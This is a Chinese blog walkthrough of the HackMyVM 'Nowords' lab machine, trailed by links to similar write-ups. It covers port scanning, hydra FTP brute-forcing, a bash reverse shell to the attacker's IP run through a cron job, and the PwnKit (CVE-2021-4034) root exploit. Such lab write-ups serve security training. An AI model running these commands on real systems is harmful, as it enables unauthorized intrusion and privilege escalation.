HackMyVM-Nowords靶机的测试报告

最新推荐文章于 2025-02-22 11:32:33 发布
原创 最新推荐文章于 2025-02-22 11:32:33 发布 · 1.1k 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #HackMyVM靶场 #反弹shell #ai识图 #ftp #Pwnkit #定时任务

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

获取ftp的登录凭证

2、Getshell

3、提权

四、结论

一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.159.127)

靶  机:ubuntu20.04(192.168.159.169)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、hydra(爆破ftp登录)、ftp(登录ftp服务)、nc(监听反弹shell)、python3(开启web服务)

010 editor(查看文件16进制信息)

测试网址:http://192.168.159.169

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=Nowords

二、测试目的

熟悉识图提取文字的方法,拓展思维,拿下2个flag。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.159.169

物理机IP:192.168.159.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.159.169

靶机开放21端口(ftp服务)、80端口(web服务)

目录扫描

gobuster dir -u http://192.168.159.169 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

获取ftp的登录凭证

在主页的源代码中找到一句提示:用户名和密码都是小写

访问robots.txt文件会直接下载,使用010 editor查看16进制,发现文件头是PNG的格式

修改后缀名为png并查看图片,是一些目录,需要提取为txt

推荐是用ai识图提取文字即可,我用的Xiaomi超级小爱,识别文字很准确

也可以直接复制下方:

/ewqpoiewopqiewq

/490382490328423

/fdsnmrewrwerew

/uoijfdsijiofds

/rewjlkjsdf

/rwen908098vcxvcx

/kvjciovcuxioufhydsfdsyr

/klvcxhyvcxkljhyvcxiuzxcioyv

/oiufdsaoifndasuiofhdsa

/klhvcoixzuyvxcizoyvzxcuiyv

/pvycuxivhyzxcuivyzxiouvyzxc

/kifjdsaoipfuasoifjasipofudas

/oidfphkljerhwqlkjrheqwkjlh

/mncvmzxoiurewqioyrwqrewqrr

/oiupoiuopiuopiuioyuiyiuyio

/ghasfdhasfdhasdghasfdhgasfdasjf

/nbvnmvnbvnmzxvncvznbxcvznvzx

/vnbewqveqwbmvenqwbvrnwevrhjwefhjvwerj

/hvuixctyvcyuxgivxcyuvfxcyuvigfxc

/uihysaidouyasiudysquidhqiuodhqiudqhiodu

/hfdsioufhdsiuhvcxiuovyhcxiuvgxcivhcxbcviux

/vhsdiufyhdsuivhxcuivhuisdhfids

/jfd9s87fds89cvxyvxc789v6cx

/m98789789ds7a89d7sah98zxc78

/dsaknewiquiodusjadsa

/vcxjhkluioyfdsrew

/vcxoiufdsnkjnewq

/iouoiuvcxvcxfds

/uoihbnnmxcbmxcnbvx

/mdsaydqnfdsoiurewnh

/ioufdosijnmieowryu

/oiufdsnrewjhuiyfsd

/rewnkvoiuxvfdsfdsrwqe

/kuviosjdfiojdsifoyuewhq

/hvioxcuyiofuasdhfkjlsnafoidsy

根据这些目录名,爆破路径,得到一个有效路径:/oiufdsnrewjhuiyfsd

gobuster dir -u http://192.168.159.169 -w ./directory.txt -x php,jsp,html,txt

访问该路径同样会直接下载,使用010 editor分析,该文件为jpg格式

修改文件后缀名并查看图片,是一些名字信息,看来这就是字典了

可以直接复制下方,txt文档也会做附件上传:

Quinn

Nevaeh

Piper

Ruby

Serenity

Willow

Everly

Cora

Kaylee

Lydia

Aubree

Arianna

Eliana

Peyton

Melanie

Gianna

Isabelle

Julia

Valentina

Nova

Clara

Vivian

Reagan

Mackenzie

Madeline

Brielle

Delilah

Isla

Rylee

Katherine

Sophie

Josephine

Ivy

Liliana

Jade

Maria

Taylor

Hadley

Kylie

Emery

Adalynn

Natalia

Annabelle

Faith

Alexandra

Ximena

Ashley

Brianna

Raelynn

Bailey

Mary

Athena

Andrea

Leilani

Jasmine

Lyla

Margaret

Alyssa

Adalyn

Arya

Norah

Khloe

Kayla

Eden

Eliza

Rose

Ariel

Melody

Alexis

Isabel

Sydney

Juliana

Lauren

Iris

Emerson

爆破靶机的ftp服务,用户名和密码都在这里面

将大写字母换成小写

cat dic.txt | tr 'A-Z' 'a-z' > dic1.txt

开始爆破,泡杯茶喝,大概需要10分钟

hydra -L dic1.txt -P dic1.txt 192.168.159.169 ftp

爆出账户和密码就可以退出了

sophie/natalia

2、Getshell

ftp登录靶机查看,有很多文件

sophie/natalia

去上级目录查看,有一个me的文件夹

有一个python文件和user.txt

cd ..
ls
cd me
ls
get doit.py
get user.txt

查看两个文件

user.txt: Icanreadyeah

python文件的主要内容是:提取command.jpg图片文字信息,并作为系统命令执行,将执行代码记录到log.txt中

command.jpg和log.txt在sophie目录中

可以看到log.txt文件的生成时间是现在生成的,猜测python脚本是定时执行,因此定时更新log.txt

可以看到执行的是id命令

获取shell的方法就是上传一个shell脚本,然后做一个调用shell脚本执行命令并截图,替换command.jpg,等待定时任务执行反弹shell命令来获取shell

bash -i >& /dev/tcp/192.168.159.127/6666 0>&1

command.jpg图片如下:

成功获取反弹shell

cd ../me
cat user.txt

user.txt: Icanreadyeah

3、提权

上传漏洞扫描脚本到靶机,脚本地址:

https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

上传靶机后扫描

wget 192.168.159.127:8888/linux.sh
chmod +x linux.sh
./linux.sh

扫出很多内核漏洞,比如知名的DirtyPipe和Pwnkit

exp下载地址:https://codeload.github.com/berdav/CVE-2021-4034/zip/main

下载后上传靶机并解压,直接运行cve-2021-4034.sh脚本即可获取root权限

wget 192.168.159.127:8888/CVE-2021-4034-main.zip
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
ls -la
./cve-2021-4034.sh
SHELL=/bin/bash script -q

查看root.txt

cd ~
cat root.txt

root.txt: Ihavenowords

四、结论

作者利用识别图中文字来作为信息,作为命令的想法特别新奇。利用定时任务完成反弹shell。

CHill_HACK靶机渗透测试
weixin_49340699的博客
07-23 673
CHill_HACK靶机渗透测试环境工具流程 环境 kali IP 192.168.19.131 靶机 IP 192.168.19.154 工具 netdicover nmap gobuster netcat steghide frackzip base64在线解码 流程 首先使用netdiscover对目标网段进行扫描主机发现 发现目标主机192.168.19.154 nmap对端口扫描信息收集 目标靶机开启了ssh,ftp,http 先从21端口开始收集查看ftp是否存在匿名登录,存在匿名登录,登录
靶机大全
热门推荐
weixin_30471561的博客
05-18 1万+
本指南主要通过介绍一些常用渗透环境,给pentester们以自己修炼的机会,并配合一些常规的pentest tools达到学习目的 名称: WebGoat 项目地址:http://www.owasp.org/index.php/OWASP_WebGoat_Project 简介:OWASP项目,WebGoat是一个用于讲解典型web漏洞的基于J2EE架构的web应用 名称: ...
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 2719
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
hackmyvm-hostname靶机
weixin_52710247的博客
11-16 535
hostname靶机复现
oscp备考——Kioptix Level 1~5靶场详解
2301_80552914的博客
02-22 932
oscp备考,oscp系列——Kioptix Level 1靶场Kioptix Level 1难度为简单靶场,主要考察nmap的使用已经是否会看输出,以及是否会通过应用查找对应漏洞主要有mod_ssl低版本的getshell漏洞和samba的溢出getshell漏洞(CVE-2007-2447)nmap不能探测出samba版本,需要使用msf的smb_version进行探测使用查看文件即可**端口:**443**版本:**Apache mod_ssl < 2.8.7。
Hackme靶机 保姆级最详细教程!!!
2401_85783544的博客
07-29 796
最后直接dump,把内容下载下来,我们看到了superadmin超级管理员,他的密码是加密状态,进行解密。2.用御剑扫描一下1-255的端口,发现59和60之间出现了一个奇怪的131,我们可以尝试访问一下,发现登录成功说明131就是靶机的地址.4.输入刚才注册的用户名和密码,可以看到登录进来了,我们输入sql注入语句 ' or 1=1 #9.这个时候我们在访问之前的一个上传目录uploads,可以看到我们上传的6.php。8.我们去直接登录,可以看到上传按钮,这个时候上传一个一句话木马。
Hack the box -- 靶机渗透测试(TIER1)
wjishuxiaobai的博客
06-22 1660
本文针对Hack the box 靶机TIER1渗透过程进行记录。开启在线靶机靶机IP为10.129.208.78。2.SQL注入 浏览器输入靶机IP10.129.208.78,页面如下。发现是个登录界面,首先尝试常见密码登录如root:root admin:admin administrator:password,登录失败。 随即尝试SQL注入,用户名输入admin‘#,密码输入 123(可随意输入)。成功登录。 Flag 成功获取开启在线靶机靶机IP为10.129.246.195。开启在线靶机,靶
hackmyvm靶场Nowords靶机图片上的文字信息提取
01-17
在深入探讨如何从hackmyvm靶场Nowords靶机图片中提取文字信息之前,我们首先要了解文字提取在信息安全领域中的重要性以及相关技术方法。文字提取通常指的是从图片或视频等非文本形式的媒介中识别并获取可编辑的...
C语言实验6-9 统计一行文本的单词个数 分数 15 作者 张彤彧 单位 浙江大学 本题目要求编写程序统计一行字符中单词的个数。所谓“单词”是指连续不含空格的字符串,各单词之间用空格分隔,空格数可以是多个。 输入格式: 输入给出一行字符。 输出格式: 在一行中输出单词个数。 输入样例: Let's go to room 209. 输出样例: 5
最新发布
06-17
| `NoWords` | `0` | 无单词时输出0 | #### 输入结束方式 - **命令行输入**:按 `Ctrl+D` (Linux/Mac) 或 `Ctrl+Z` (Windows) 发送EOF - **文件输入**:自动在文件结束时停止 #### 其他优化建议 1. **处理边界情况...
简单啊纯静态网址导航源码 v1.0
04-22
内页LOGO位置 /img/logo_v3_nowords.gif 2.统计代码,网站版权信息,备案信息,用记事本或者其他编辑器直接打开index.htm,在最底部修改。 3.替换 http://www.wozaixianshang.com 为您自己的网站地址
简单啊纯静态网址导航最新官方版
04-03
内页LOGO位置 /img/logo_v3_nowords.gif 2.统计代码,网站版权信息,备案信息,用记事本或者其他编辑器直接打开index.htm,在最底部修改。 3.替换 http://www.wozaixianshang.com 为您自己的网站地址
简单啊纯静态网址导航 v1.0
10-17
修改LOGO首页LOGO位置 /img/jiandana.png /img/logo_v3.gif 两个内页LOGO位置 /img/logo_v3_nowords.gif2.统计代码,网站版权信息,备案信息,用记事本或者其他编辑器直接打开index.htm,在最底部修改。3.替换 ...
ha:isro靶机 writeup(并不完整)
id_null的博客
11-02 804
靶机地址:https://www.vulnhub.com/entry/ha-isro,376/ 根据作者的提示,一共四个flag,主要测试枚举的能力,后面我才发现是枚举说的是社工。。。 Aryabhata Bhaskara Mangalyaan Chandrayaan 2 0x01 遇事不决nmap nmap扫描结果: 192.168.109.129 22 ssh 80 htt...
hacknos靶机-----1
ppbgi的博客
05-19 167
进行虚拟机的安装 参考文档:https://www.w3xue.com/exp/article/20212/69978.html 接下来开始操作 一、利用kali自带的nmap进行ip的扫描 在进行开放端口的扫描: 在本地的浏览器进行访问,成功! 接下来进行目录的扫描: 进行敏感文件的查看,得到了drupal的版本,然后利用msf进行操作: 拿到shell之后,开始进行提权; 生成密码,在kali本地进行下载: 然后在靶机的操作界面中输入: python3 -c 'impo.
HACKME:1靶机
JKding123的博客
10-22 1164
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 2145
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
靶机渗透_hackthebox__jarvis -7
qq_34717555的博客
11-11 678
目标IP:10.10.10.143 Nmap scan report for supersecurehotel.htb (10.10.10.143) Host is up (0.28s latency). Not shown: 939 closed ports, 58 filtered ports PORT STATE SERVICE VERSION 22/tcp open ss...
Hack the box -- 靶机渗透测试(TIER0)
wjishuxiaobai的博客
06-21 899
本文针对Hack the box 靶机渗透过程进行记录。开启在线靶机靶机IP为10.129.10.113。 首先使用Nmap进行端口扫描,扫描命令为nmap -v -sV -sC 10.129.50.113。 发现其开放了23端口的telnet服务,即可以提供远程登陆。所以我们尝试使用telnet连接目标主机。 不出所料需要密码进行登陆。 猜测密码,尝试登陆 使用常见的密码如admin、administrator、root等,发现输入root成功登陆。 查找Flag 总结 至此,靶机Meow已成功攻破。
HA: Wordy靶机-Walkthrough
ins1ght的博客
10-04 1552
这个靶机可利用的漏洞挺多的,像LFI、RFI、文件上传、SQLi,我试着把这几个漏洞都复现了一遍,尽管并不是所有的漏洞都能getshell。最后提权的时候使用了SUID权限的wget,对,你没看错,是wget。除了vim、less、more、nano、cp、mv、find、bash以及nmap,现在又多了一个wget,意不意外,惊不惊喜?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ccc_9wy

觉得写的好的话就赏杯奶茶喝吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值